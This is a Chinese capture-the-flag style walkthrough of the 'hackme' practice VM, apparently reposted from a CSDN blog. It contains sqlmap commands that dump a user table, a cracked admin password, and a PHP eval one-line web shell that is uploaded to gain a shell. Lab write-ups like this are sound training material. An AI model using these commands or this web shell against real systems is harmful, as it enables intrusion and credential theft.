欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 游戏 > 文件解析漏洞靶机---- 练习通关攻略

文件解析漏洞靶机---- 练习通关攻略

2025/3/14 9:25:36 来源:https://blog.csdn.net/qq_65379983/article/details/146242692  浏览:    关键词:文件解析漏洞靶机---- 练习通关攻略

1.安装靶机

点击  hackme.ova   文件,直接导入虚拟机,选择存储位置

2. 开启靶机

3. kali扫描同C段的ip,找到靶机ip

nmap  192.168.182.1/24

经判断,靶机ip为:192.168.182.157

开启端口 http 80  、ssh 远程连接 22 

4.  浏览器访问ip

显示一个登录界面,有输入框,可能存在SQL注入    存在注册连接,后面可能会有用

5. kali的dirb扫描敏感目录:dirb "http://ip"

6.访问  index.php   和  /uploads/  两个网址

 index.php访问仍是登录界面

http://192.168.182.157/uploads/   发现上传文件的目录,无上传位置,暂时没思路操作

7. 返回登录界面http://ip,注册一个用户,进行登录

登录成功,出现搜索框,尝试sql注入

8.  寻找注入

直接点击search,发现弹出多个书籍信息,选一个作为值进行注入判断过程

9.  使用OSINT,使用BurpSuite抓包,保存数据包为txt文件

10. kali使用sqlmap工具爆破

爆破数据库输入:sqlmap -r '/home/kali/Desktop/test.txt' --dbs 

发现一个数据库: webapphacking

爆破数据表:sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking --tables

发现users表

 爆破表数据:sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking -T users --dump

发现superadmin用户,密码:2386acb2cf356944177746fc92523983

32位,采用hash加密,尝试md5解码

md5解码网址:MD5免费在线解密破解_MD5在线加密-SOMD5

密码:Uncrackable

11.使用superadmin用户登录

退出账号后,再重新登录

出现上传界面,结合之前的/uploads/可查看上传文件的目录,尝试上传木马文件

12. 上传一句话木马文件进行尝试

<?php @eval($_POST['cmd']);?>

 发现一句话木马直接上传成功

13.访问/uploads/页面,访问该木马文件

输入:http://192.168.182.157/uploads/

点击文件test1.php,进行访问    访问成功

14. 蚁剑尝试连接

连接成功,获取了shell

 

hackme文件解析漏洞靶机,此次练习仅做到获取shell。

练习到此结束,希望对各位有所帮助吧。仅供参考,有所不足请大家多见谅。

                                                                                                        ---------------2025/3/13  23;45

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词